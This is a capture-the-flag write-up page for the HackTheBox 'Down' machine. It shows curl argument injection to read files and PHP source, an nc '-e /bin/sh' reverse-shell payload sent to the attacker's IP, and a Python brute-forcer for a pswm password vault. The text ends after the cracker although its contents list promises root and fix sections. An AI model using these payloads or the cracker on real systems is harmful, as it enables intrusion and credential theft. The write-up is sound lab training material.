<!DOCTYPE html>
<html lang="en" data-theme="dark">
<head>

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>HTB: Down | r3vpwnx</title>
<meta name="description" content="Red Team | Offensive Security">
<meta name="author" content="r3vpwnx">
<link rel="icon" type="image/svg+xml" href="/images/favicon.svg">
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 8.1.2"></head>
<body>
  <div class="bg-layer" id="bgLayer" style="background-image: url('/images/background.jpeg');"></div>
  <div class="bg-overlay" id="bgOverlay"></div>

  <header class="topnav">
  <div class="topnav-inner">
    <a class="brand" href="/">
      <span class="brand-glitch" data-text="r3vpwnx">r3vpwnx</span>
    </a>

    <button class="nav-toggle" id="navToggle" aria-label="Toggle navigation" aria-expanded="false">
      <span></span><span></span><span></span>
    </button>

    <nav class="nav-links" id="navLinks">
      <button class="nav-link search-trigger" id="searchTrigger" type="button" aria-label="Search">
        <svg viewBox="0 0 24 24" width="16" height="16" aria-hidden="true">
          <circle cx="10.5" cy="10.5" r="6.5" fill="none" stroke="currentColor" stroke-width="2"/>
          <line x1="20" y1="20" x2="15.2" y2="15.2" stroke="currentColor" stroke-width="2" stroke-linecap="round"/>
        </svg>
        <span>Search</span>
      </button>
      
        <a href="/" class="nav-link">Home</a>
      
        <a href="/categories/writeups/" class="nav-link">Writeups</a>
      
        <a href="/categories/articles/" class="nav-link">Articles</a>
      
        <a href="/archives/" class="nav-link">Archive</a>
      
        <a href="/tags/" class="nav-link">Tags</a>
      
        <a href="/categories/" class="nav-link">Categories</a>
      
        <a href="/categories/cheatsheets/" class="nav-link">Cheatsheets</a>
      
        <a href="/about/" class="nav-link">About</a>
      
    </nav>
  </div>
</header>


  <div class="page-shell">
    <aside class="sidebar" id="sidebar">
  <div class="profile-card">
    <img class="avatar" src="/images/r3vpwnx.jpg" alt="r3vpwnx">
    <h2 class="profile-name">r3vpwnx</h2>
    <p class="profile-tagline">Red Team | Offensive Security</p>

    
    <a class="btn-follow" href="https://github.com/r3vpwnx" target="_blank" rel="noopener noreferrer">
      <svg viewBox="0 0 24 24" width="16" height="16" aria-hidden="true">
        <circle cx="12" cy="13" r="8" fill="none" stroke="currentColor" stroke-width="1.8"/>
        <path d="M7 8 L9.5 5.5" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round"/>
        <path d="M17 8 L14.5 5.5" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round"/>
        <circle cx="9" cy="12.5" r="1.1" fill="currentColor"/>
        <circle cx="15" cy="12.5" r="1.1" fill="currentColor"/>
      </svg>
      Follow on GitHub
    </a>
    

    <div class="social-links">
      
      <a href="https://x.com/r3vpwnx" target="_blank" rel="noopener noreferrer" aria-label="X (Twitter)" title="X">
        <svg viewBox="0 0 24 24" width="18" height="18" aria-hidden="true">
          <circle cx="12" cy="12" r="9" fill="none" stroke="currentColor" stroke-width="1.6"/>
          <line x1="8" y1="8" x2="16" y2="16" stroke="currentColor" stroke-width="1.8" stroke-linecap="round"/>
          <line x1="16" y1="8" x2="8" y2="16" stroke="currentColor" stroke-width="1.8" stroke-linecap="round"/>
        </svg>
      </a>
      

      
      <a href="https://linkedin.com/in/r3vpwnx" target="_blank" rel="noopener noreferrer" aria-label="LinkedIn" title="LinkedIn">
        <svg viewBox="0 0 24 24" width="18" height="18" aria-hidden="true">
          <rect x="3" y="3" width="18" height="18" rx="4" fill="none" stroke="currentColor" stroke-width="1.6"/>
          <text x="12" y="16.5" font-family="Arial, sans-serif" font-size="10" font-weight="700" fill="currentColor" text-anchor="middle">in</text>
        </svg>
      </a>
      

      
      <a href="https://instagram.com/r3vpwnx" target="_blank" rel="noopener noreferrer" aria-label="Instagram" title="Instagram">
        <svg viewBox="0 0 24 24" width="18" height="18" aria-hidden="true">
          <rect x="3.5" y="3.5" width="17" height="17" rx="5" fill="none" stroke="currentColor" stroke-width="1.6"/>
          <circle cx="12" cy="12" r="4" fill="none" stroke="currentColor" stroke-width="1.6"/>
          <circle cx="16.7" cy="7.3" r="1" fill="currentColor"/>
        </svg>
      </a>
      
    </div>

    
    <a class="btn-support" href="https://paypal.me/theoptech" target="_blank" rel="noopener noreferrer">
      <svg viewBox="0 0 24 24" width="16" height="16" aria-hidden="true">
        <path d="M6 4h8a4.5 4.5 0 0 1 4.4 5.5A5.5 5.5 0 0 1 13 14h-3l-1 6H6L8.2 4Z" fill="none" stroke="currentColor" stroke-width="1.6" stroke-linejoin="round"/>
      </svg>
      Support via PayPal
    </a>
    
  </div>
</aside>

    <main class="content">
      <article class="post">
  <header class="post-header">
    <h1 class="post-title">HTB: Down</h1>
    <div class="post-meta">
      <time datetime="2025-06-20T09:00:00.000Z">published 2025-06-20</time>
      
      
        
          <a class="pill" href="/categories/writeups/">Writeups</a>
        
      
    </div>
  </header>

  
  
  <details class="post-toc" open>
    <summary class="post-toc-title">Table of Contents</summary>
    <ol class="toc"><li class="toc-item toc-level-5"><a class="toc-link" href="#Path-to-root-at-a-glance"><span class="toc-text">Path to root, at a glance:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#nmap"><span class="toc-text">nmap</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#The-app"><span class="toc-text">The app</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Argument-injection-%E2%86%92-file-read"><span class="toc-text">Argument injection → file read</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Reading-the-source"><span class="toc-text">Reading the source</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Shell-as-www-data"><span class="toc-text">Shell as www-data</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Privilege-escalation-the-pswm-vault"><span class="toc-text">Privilege escalation: the pswm vault</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#What-the-format-actually-is"><span class="toc-text">What the format actually is</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Cracking-it"><span class="toc-text">Cracking it</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Root"><span class="toc-text">Root</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Why-it-worked-three-fixes"><span class="toc-text">Why it worked (three fixes)</span></a></li></ol>
  </details>
  

  <div class="post-content">
    <p><strong>Down</strong> is an easy Linux box (the first VulnLab → HTB migration) that hinges on a single primitive: <code>escapeshellcmd()</code> stops <em>command</em> injection but does nothing about <em>argument</em> injection. A website-uptime checker shells out to <code>curl</code> and <code>nc</code> with user input glued into the command string. I abuse curl’s multi-URL handling to read arbitrary files, recover the PHP source, then abuse an <code>intval()</code>&#x2F;original-string validation gap in an “expert mode” to inject <code>-e /bin/sh</code> into <code>nc</code> for a shell. Root falls out of a cracked <code>pswm</code> vault (scrypt + AES-GCM) and a wide-open sudo rule.</p>
<h5 id="Path-to-root-at-a-glance"><a href="#Path-to-root-at-a-glance" class="headerlink" title="Path to root, at a glance:"></a>Path to root, at a glance:</h5><ol>
<li>Inject a curl argument → read arbitrary files → dump the PHP source.</li>
<li>Read the source → find a hidden <code>expertmode</code> that runs <code>nc</code> with a validation bug.</li>
<li>Inject <code>-e /bin/sh</code> into <code>nc</code> → shell as <code>www-data</code>.</li>
<li>Loot a <code>pswm</code> password vault → crack it offline → password for <code>aleks</code>.</li>
<li><code>aleks</code> has full <code>sudo</code> → root.</li>
</ol>
<hr>
<h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">┌──(pwn㉿pwn)-[~/HTB]</span><br><span class="line">└─$ <span class="built_in">sudo</span> nmap -Pn -A 10.129.47.7</span><br><span class="line">[<span class="built_in">sudo</span>] password <span class="keyword">for</span> pwn: </span><br><span class="line">Starting Nmap 7.99 ( https://nmap.org ) at 2026-08-07 13:30 -0400</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 10.129.47.7</span><br><span class="line">Host is up (0.37s latency).</span><br><span class="line">Not shown: 998 closed tcp ports (reset)</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.11 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">| ssh-hostkey: </span><br><span class="line">|   256 f6:cc:21:7c:ca:da:ed:34:fd:04:ef:e6:f9:4c:<span class="built_in">dd</span>:f8 (ECDSA)</span><br><span class="line">|_  256 fa:06:1f:f4:bf:8c:e3:b0:c8:40:21:0d:57:06:<span class="built_in">dd</span>:11 (ED25519)</span><br><span class="line">80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))</span><br><span class="line">|_http-title: Is it down or just me?</span><br><span class="line">|_http-server-header: Apache/2.4.52 (Ubuntu)</span><br><span class="line">Device <span class="built_in">type</span>: general purpose|router</span><br><span class="line">Running: Linux 4.X|5.X, MikroTik RouterOS 7.X</span><br><span class="line">OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3</span><br><span class="line">OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)</span><br><span class="line">Network Distance: 2 hops</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">TRACEROUTE (using port 8080/tcp)</span><br><span class="line">HOP RTT       ADDRESS</span><br><span class="line">1   361.98 ms 10.10.14.1</span><br><span class="line">2   362.23 ms 10.129.47.7</span><br><span class="line"></span><br><span class="line">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap <span class="keyword">done</span>: 1 IP address (1 host up) scanned <span class="keyword">in</span> 31.51 seconds</span><br></pre></td></tr></table></figure>

<p>OpenSSH 8.9p1 + Apache 2.4.52 → Ubuntu 22.04 (jammy). Neither version buys anything; the web app is the target.</p>
<h3 id="The-app"><a href="#The-app" class="headerlink" title="The app"></a>The app</h3><img width="1231" height="610" alt="image" src="https://github.com/user-attachments/assets/955d68ba-ce63-43ec-ae44-29a49ebfe49b" />

<p><code>index.php</code> takes a URL and reports whether the site is up. Point it at your own listener and you see how it fetches:</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">&gt; nc -nvlp 80</span><br><span class="line">listening on [any] 80 ...</span><br><span class="line">connect to [10.10.14.242] from (UNKNOWN) [10.129.47.7] 35308</span><br><span class="line">GET / HTTP/1.1</span><br><span class="line">Host: 10.10.14.242</span><br><span class="line">User-Agent: curl/7.81.0</span><br><span class="line">Accept: */*</span><br></pre></td></tr></table></figure>

<p>So the app runs something like <code>curl -s &lt;your input&gt;</code>. First instinct is command injection — try <code>http://localhost; whoami</code>, <code>| id</code>, <code>&amp;&amp; ping</code>, etc. None of it fires. So the app is escaping shell metacharacters. But escaping metacharacters is not the same as escaping <em>arguments</em>.</p>
<h3 id="Argument-injection-→-file-read"><a href="#Argument-injection-→-file-read" class="headerlink" title="Argument injection → file read"></a>Argument injection → file read</h3><img width="1237" height="768" alt="image" src="https://github.com/user-attachments/assets/fa29d9cb-d2c4-42ea-ba18-681205cfb5b5" />

<p>Prove we control curl’s argv by injecting its own help flag:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">http://127.0.0.1 -h</span><br></pre></td></tr></table></figure>

<img width="844" height="549" alt="image" src="https://github.com/user-attachments/assets/5580e7b8-e1fd-49f1-abec-be93e6399d56" />

<p>The response comes back full of curl’s usage text — our input is being parsed as curl options. Now weaponize it. curl fetches multiple URLs in sequence, so pass a dummy HTTP URL to satisfy the <code>^https?://</code> check, a space, then a <code>file://</code> read:</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">http://127.0.0.1/ file:///etc/hostname</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">http://127.0.0.1/ file:///etc/passwd</span><br></pre></td></tr></table></figure>

<img width="1226" height="943" alt="image" src="https://github.com/user-attachments/assets/2d1c73e0-4d58-4624-98e9-998c2f28f200" />

<p>From <code>/etc/passwd</code>: two real users, <code>root</code> and <code>aleks</code>.</p>
<h3 id="Reading-the-source"><a href="#Reading-the-source" class="headerlink" title="Reading the source"></a>Reading the source</h3><p>Grab the app source through the same primitive:</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">http://127.0.0.1/ file:///var/www/html/index.php</span><br></pre></td></tr></table></figure>

<p>Two request handlers. The normal one is the <code>curl</code> branch we already abused. The interesting one is gated behind a hidden GET parameter, <code>?expertmode=tcp</code>:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span> ( <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;expertmode&#x27;</span>]) &amp;&amp; <span class="variable">$_GET</span>[<span class="string">&#x27;expertmode&#x27;</span>] === <span class="string">&#x27;tcp&#x27;</span> ) &#123;</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&#x27;&lt;h1&gt;Is the port refused, or is it just you?&lt;/h1&gt;</span></span><br><span class="line"><span class="string">        &lt;form id=&quot;urlForm&quot; action=&quot;index.php?expertmode=tcp&quot; method=&quot;POST&quot;&gt;</span></span><br><span class="line"><span class="string">            &lt;input type=&quot;text&quot; id=&quot;url&quot; name=&quot;ip&quot; placeholder=&quot;Please enter an IP.&quot; required&gt;&lt;br&gt;</span></span><br><span class="line"><span class="string">            &lt;input type=&quot;number&quot; id=&quot;port&quot; name=&quot;port&quot; placeholder=&quot;Please enter a port number.&quot; required&gt;&lt;br&gt;</span></span><br><span class="line"><span class="string">            &lt;button type=&quot;submit&quot;&gt;Is it refused?&lt;/button&gt;</span></span><br><span class="line"><span class="string">        &lt;/form&gt;&#x27;</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&#x27;&lt;h1&gt;Is that website down, or is it just you?&lt;/h1&gt;</span></span><br><span class="line"><span class="string">        &lt;form id=&quot;urlForm&quot; action=&quot;index.php&quot; method=&quot;POST&quot;&gt;</span></span><br><span class="line"><span class="string">            &lt;input type=&quot;url&quot; id=&quot;url&quot; name=&quot;url&quot; placeholder=&quot;Please enter a URL.&quot; required&gt;&lt;br&gt;</span></span><br><span class="line"><span class="string">            &lt;button type=&quot;submit&quot;&gt;Is it down?&lt;/button&gt;</span></span><br><span class="line"><span class="string">        &lt;/form&gt;&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ( <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;expertmode&#x27;</span>]) &amp;&amp; <span class="variable">$_GET</span>[<span class="string">&#x27;expertmode&#x27;</span>] === <span class="string">&#x27;tcp&#x27;</span> &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;ip&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;port&#x27;</span>]) ) &#123;</span><br><span class="line">  <span class="variable">$ip</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;ip&#x27;</span>]);</span><br><span class="line">  <span class="variable">$valid_ip</span> = <span class="title function_ invoke__">filter_var</span>(<span class="variable">$ip</span>, FILTER_VALIDATE_IP);</span><br><span class="line">  <span class="variable">$port</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;port&#x27;</span>]);</span><br><span class="line">  <span class="variable">$port_int</span> = <span class="title function_ invoke__">intval</span>(<span class="variable">$port</span>);</span><br><span class="line">  <span class="variable">$valid_port</span> = <span class="title function_ invoke__">filter_var</span>(<span class="variable">$port_int</span>, FILTER_VALIDATE_INT);</span><br><span class="line">  <span class="keyword">if</span> ( <span class="variable">$valid_ip</span> &amp;&amp; <span class="variable">$valid_port</span> ) &#123;</span><br><span class="line">    <span class="variable">$rc</span> = <span class="number">255</span>; <span class="variable">$output</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">    <span class="variable">$ec</span> = <span class="title function_ invoke__">escapeshellcmd</span>(<span class="string">&quot;/usr/bin/nc -vz <span class="subst">$ip</span> <span class="subst">$port</span>&quot;</span>);</span><br><span class="line">    <span class="title function_ invoke__">exec</span>(<span class="variable">$ec</span> . <span class="string">&quot; 2&gt;&amp;1&quot;</span>,<span class="variable">$output</span>,<span class="variable">$rc</span>);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;&lt;div class=&quot;output&quot; id=&quot;outputSection&quot;&gt;&#x27;</span>;</span><br><span class="line">    <span class="keyword">if</span> ( <span class="variable">$rc</span> === <span class="number">0</span> ) &#123;</span><br><span class="line">      <span class="keyword">echo</span> <span class="string">&quot;&lt;font size=+1&gt;It is up. It&#x27;s just you! 😝&lt;/font&gt;&lt;br&gt;&lt;br&gt;&quot;</span>;</span><br><span class="line">      <span class="keyword">echo</span> <span class="string">&#x27;&lt;p id=&quot;outputDetails&quot;&gt;&lt;pre&gt;&#x27;</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="title function_ invoke__">implode</span>(<span class="string">&quot;\n&quot;</span>,<span class="variable">$output</span>)).<span class="string">&#x27;&lt;/pre&gt;&lt;/p&gt;&#x27;</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">      <span class="keyword">echo</span> <span class="string">&quot;&lt;font size=+1&gt;It is down for everyone! 😔&lt;/font&gt;&lt;br&gt;&lt;br&gt;&quot;</span>;</span><br><span class="line">      <span class="keyword">echo</span> <span class="string">&#x27;&lt;p id=&quot;outputDetails&quot;&gt;&lt;pre&gt;&#x27;</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="title function_ invoke__">implode</span>(<span class="string">&quot;\n&quot;</span>,<span class="variable">$output</span>)).<span class="string">&#x27;&lt;/pre&gt;&lt;/p&gt;&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;&lt;div class=&quot;output&quot; id=&quot;outputSection&quot;&gt;&#x27;</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;&lt;font color=red size=+1&gt;Please specify a correct IP and a port between 1 and 65535.&lt;/font&gt;&#x27;</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125; <span class="keyword">elseif</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;url&#x27;</span>])) &#123;</span><br><span class="line">  <span class="variable">$url</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;url&#x27;</span>]);</span><br><span class="line">  <span class="keyword">if</span> ( <span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;|^https?://|&#x27;</span>,<span class="variable">$url</span>) ) &#123;</span><br><span class="line">    <span class="variable">$rc</span> = <span class="number">255</span>; <span class="variable">$output</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">    <span class="variable">$ec</span> = <span class="title function_ invoke__">escapeshellcmd</span>(<span class="string">&quot;/usr/bin/curl -s <span class="subst">$url</span>&quot;</span>);</span><br><span class="line">    <span class="title function_ invoke__">exec</span>(<span class="variable">$ec</span> . <span class="string">&quot; 2&gt;&amp;1&quot;</span>,<span class="variable">$output</span>,<span class="variable">$rc</span>);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;&lt;div class=&quot;output&quot; id=&quot;outputSection&quot;&gt;&#x27;</span>;</span><br><span class="line">    <span class="keyword">if</span> ( <span class="variable">$rc</span> === <span class="number">0</span> ) &#123;</span><br><span class="line">      <span class="keyword">echo</span> <span class="string">&quot;&lt;font size=+1&gt;It is up. It&#x27;s just you! 😝&lt;/font&gt;&lt;br&gt;&lt;br&gt;&quot;</span>;</span><br><span class="line">      <span class="keyword">echo</span> <span class="string">&#x27;&lt;p id=&quot;outputDetails&quot;&gt;&lt;pre&gt;&#x27;</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="title function_ invoke__">implode</span>(<span class="string">&quot;\n&quot;</span>,<span class="variable">$output</span>)).<span class="string">&#x27;&lt;/pre&gt;&lt;/p&gt;&#x27;</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">      <span class="keyword">echo</span> <span class="string">&quot;&lt;font size=+1&gt;It is down for everyone! 😔&lt;/font&gt;&lt;br&gt;&lt;br&gt;&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;&lt;div class=&quot;output&quot; id=&quot;outputSection&quot;&gt;&#x27;</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;&lt;font color=red size=+1&gt;Only protocols http or https allowed.&lt;/font&gt;&#x27;</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>The bug is the gap between <strong>(1)</strong> and <strong>(2)</strong>:</p>
<ul>
<li>The port is validated <em>after</em> <code>intval()</code>.</li>
<li>The <strong>original string</strong> — not the validated int — is what gets put in the command.</li>
</ul>
<p><code>intval()</code> reads a leading number and stops at the first non-digit:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">php &gt; <span class="keyword">echo</span> <span class="title function_ invoke__">intval</span>(<span class="string">&quot;1234 -e /bin/sh&quot;</span>);   <span class="comment">// =&gt; 1234, passes FILTER_VALIDATE_INT</span></span><br></pre></td></tr></table></figure>

<p>So <code>1234 -e /bin/sh</code> passes validation, then gets spliced straight into the <code>nc</code> command. Same <code>escapeshellcmd</code> as before → same argument-injection weakness. And this <code>nc</code> build supports <code>-e</code>, which runs a program on connect. That’s our shell.</p>
<h3 id="Shell-as-www-data"><a href="#Shell-as-www-data" class="headerlink" title="Shell as www-data"></a>Shell as www-data</h3><img width="1404" height="747" alt="image" src="https://github.com/user-attachments/assets/08788daa-6224-4f5b-98eb-0987b6681ae6" />

<p>The port field is <code>&lt;input type=&quot;number&quot;&gt;</code>, but that’s client-side only — send the request directly. Enable expert mode with <code>?expertmode=tcp</code> and inject into <code>port</code>:</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># Listener</span></span><br><span class="line">nc -lnvp 443</span><br></pre></td></tr></table></figure>

<figure class="highlight http"><table><tr><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/index.php?expertmode=tcp</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>&lt;target&gt;</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"></span><br><span class="line"><span class="language-dts"><span class="attr">ip</span><span class="operator">=</span><span class="params">&lt;your-ip&gt;</span><span class="variable">&amp;port</span>=<span class="number">443</span>+-e+<span class="keyword">/bin/</span>sh</span></span><br></pre></td></tr></table></figure>

<p>The server runs <code>nc -vz &lt;your-ip&gt; 443 -e /bin/sh</code> and connects back. Stabilize:</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">python3 -c <span class="string">&#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;</span></span><br><span class="line"><span class="comment"># Ctrl-Z</span></span><br><span class="line"><span class="built_in">stty</span> raw -<span class="built_in">echo</span>; <span class="built_in">fg</span></span><br><span class="line"><span class="built_in">export</span> TERM=xterm</span><br></pre></td></tr></table></figure>

<p>User flag: <code>/var/www/html/user_*.txt</code>.</p>
<img width="855" height="463" alt="image" src="https://github.com/user-attachments/assets/18f077f7-4468-4503-a6df-b3365472d2a2" />

<hr>
<h3 id="Privilege-escalation-the-pswm-vault"><a href="#Privilege-escalation-the-pswm-vault" class="headerlink" title="Privilege escalation: the pswm vault"></a>Privilege escalation: the pswm vault</h3><p><code>www-data</code> can partially read aleks’ home:</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">find /home/aleks -<span class="built_in">type</span> f 2&gt;/dev/null</span><br><span class="line"><span class="comment"># /home/aleks/.local/share/pswm/pswm    &lt;-- readable</span></span><br><span class="line"><span class="comment"># .ssh / .cache are 700 — denied</span></span><br></pre></td></tr></table></figure>

<p><code>pswm</code> is <a target="_blank" rel="noopener" href="https://github.com/Julynx/pswm">Julynx’s CLI password manager</a>. The vault:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">e9laWoKiJ0Od...kLggw==*xHnWpIqBWc25rrHFGPzyTg==*4Nt/05WUbySGyvDgSlpoUw==*u65Jfe0ml9BFaKEviDCHBQ==</span><br></pre></td></tr></table></figure>

<p>Four <code>*</code>-separated base64 fields — the signature of the <code>cryptocode</code> library.</p>
<img width="1216" height="235" alt="image" src="https://github.com/user-attachments/assets/54385e03-a1c5-4433-b618-966b4961992a" />

<h4 id="What-the-format-actually-is"><a href="#What-the-format-actually-is" class="headerlink" title="What the format actually is"></a>What the format actually is</h4><p>The fields are <code>ciphertext * salt * nonce * tag</code>, and the scheme is:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">key = scrypt(master_password, salt, N=2**14, r=8, p=1, dklen=32)</span><br><span class="line">pt  = AES-256-GCM.decrypt_and_verify(ciphertext, nonce, tag, key)</span><br></pre></td></tr></table></figure>

<p>The point that makes cracking clean: <strong>the GCM tag is a correctness oracle.</strong> A wrong master password derives a wrong key, <code>decrypt_and_verify</code> fails the tag, and <code>cryptocode.decrypt</code> returns <code>False</code> — never a false positive. So the crack loop is just: try password → <code>cryptocode.decrypt</code> → truthy means we’re in.</p>
<h3 id="Cracking-it"><a href="#Cracking-it" class="headerlink" title="Cracking it"></a>Cracking it</h3><p><code>pswm</code> uses <code>cryptocode</code> under the hood, so the simplest reliable cracker calls the same library the target does — feed it the vault and a wordlist, and let the GCM tag decide each guess. <code>prettytable</code> just renders the recovered <code>alias/username/password</code> rows:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> cryptocode</span><br><span class="line"><span class="keyword">import</span> argparse</span><br><span class="line"><span class="keyword">from</span> prettytable <span class="keyword">import</span> PrettyTable</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">CustomHelpFormatter</span>(argparse.HelpFormatter):</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, prog</span>):</span><br><span class="line">        <span class="built_in">super</span>().__init__(prog, max_help_position=<span class="number">50</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">bf</span>(<span class="params">encrypted_text, wordlist</span>):</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(wordlist, <span class="string">&quot;r&quot;</span>, encoding=<span class="string">&quot;utf-8&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        <span class="keyword">for</span> password <span class="keyword">in</span> f:</span><br><span class="line">            decrypted_text = cryptocode.decrypt(encrypted_text, password.strip())</span><br><span class="line">            <span class="keyword">if</span> decrypted_text:</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">&quot;[+] Master Password: %s&quot;</span> % password.strip())</span><br><span class="line">                print_decrypted_text(decrypted_text)</span><br><span class="line">                <span class="keyword">return</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;[-] Password Not Found!&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">print_decrypted_text</span>(<span class="params">decrypted_text</span>):</span><br><span class="line">    table = PrettyTable()</span><br><span class="line">    table.field_names = [<span class="string">&quot;Alias&quot;</span>, <span class="string">&quot;Username&quot;</span>, <span class="string">&quot;Password&quot;</span>]</span><br><span class="line">    <span class="keyword">for</span> line <span class="keyword">in</span> decrypted_text.splitlines():</span><br><span class="line">        alias, username, password = line.split(<span class="string">&quot;\t&quot;</span>)</span><br><span class="line">        table.add_row([alias.strip(), username.strip(), password.strip()])</span><br><span class="line">    table.align = <span class="string">&quot;l&quot;</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;[+] Decrypted Data:&quot;</span>)</span><br><span class="line">    <span class="built_in">print</span>(table)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    parser = argparse.ArgumentParser(description=<span class="string">&quot;pswm master password cracker&quot;</span>, formatter_class=CustomHelpFormatter)</span><br><span class="line">    parser.add_argument(<span class="string">&quot;-f&quot;</span>, <span class="string">&quot;--file&quot;</span>, required=<span class="literal">True</span>, <span class="built_in">help</span>=<span class="string">&quot;Path to the encrypted file&quot;</span>)</span><br><span class="line">    parser.add_argument(<span class="string">&quot;-w&quot;</span>, <span class="string">&quot;--wordlist&quot;</span>, required=<span class="literal">True</span>, <span class="built_in">help</span>=<span class="string">&quot;Path to the wordlist file&quot;</span>)</span><br><span class="line">    args = parser.parse_args()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(args.file, <span class="string">&quot;r&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        encrypted_text = f.read().strip()</span><br><span class="line">    </span><br><span class="line">    bf(encrypted_text, args.wordlist)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>

